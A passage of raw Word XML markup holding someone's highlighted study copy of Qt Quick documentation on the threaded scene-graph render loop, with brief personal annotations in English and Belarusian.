        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2015" w:anchor="beforeRendering" w:history="1">
        <w:r w:rsidRPr="00643457">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::beforeRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> signal is emitted. Applications can make direct connections (using</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2016" w:anchor="ConnectionType-enum" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::DirectConnection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) to this signal to use </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom OpenGL calls which will then stack visually beneath the QML scene</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00643457" w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu potential purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Items that have specified</w:t>
      </w:r>
      <w:r w:rsidR="00643457">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2017" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::UsePreprocess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, will have their</w:t>
      </w:r>
      <w:r w:rsidR="00643457">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2018" w:anchor="preprocess" w:history="1">
        <w:r w:rsidRPr="00643457">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::preprocess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renderer processes the nodes and calls OpenGL functions</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00643457">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2019" w:anchor="afterRendering" w:history="1">
        <w:r w:rsidRPr="00643457">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::afterRendering</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> signal is emitted. Applications can make direct connections (using</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2020" w:anchor="ConnectionType-enum" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt::DirectConnection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) to this signal to </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use custom OpenGL calls which will then stack visually over the QML scene.</w:t>
      </w:r>
      <w:r w:rsidR="00643457" w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00643457" w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu potential purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="1050"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rendered frame is </w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>swapped</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00643457">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2021" w:anchor="frameSwapped" w:history="1">
        <w:r w:rsidRPr="00643457">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::frameSwapped</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is emitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00643457" w:rsidRPr="0011590B" w:rsidRDefault="001113FB" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>While the render thread is rendering, the GUI is free to advance animations, process events, etc.</w:t>
      </w:r>
      <w:r w:rsidR="00643457" w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00643457" w:rsidRPr="00643457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>эфектыўнасць тут ёсць, бо пакуль малявальнік разлічвае сін граф, чалавек можа эфектыўна ўзаемадзейнічаць з рэндэрэрам.</w:t>
      </w:r>
      <w:r w:rsidR="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011590B" w:rsidRPr="00643457" w:rsidRDefault="0011590B" w:rsidP="0011590B">
      <w:pPr>
        <w:spacing w:before="192" w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>там дзе, гуі паток быў заблакіраваны, рэндэр паток счытваў дадзены з ГУІ-патока. Але гэта адбываецца яшчэ да малявання</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253BB1" w:rsidRPr="00966C49" w:rsidRDefault="00966C49" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>12:37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="002D4D27" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5E74">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The threaded renderer is</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> currently used by </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default on Windows with opengl32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux with non-Mesa based drivers</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>macOS, mobile platforms, and Embedded Linux with EGLFS but this is subject to change</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It is possible to force use of the threaded renderer by setting</w:t>
      </w:r>
      <w:r w:rsidR="002D4D27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4D27">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDER_LOOP=threaded</w:t>
      </w:r>
      <w:r w:rsidR="002D4D27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the environment.</w:t>
      </w:r>
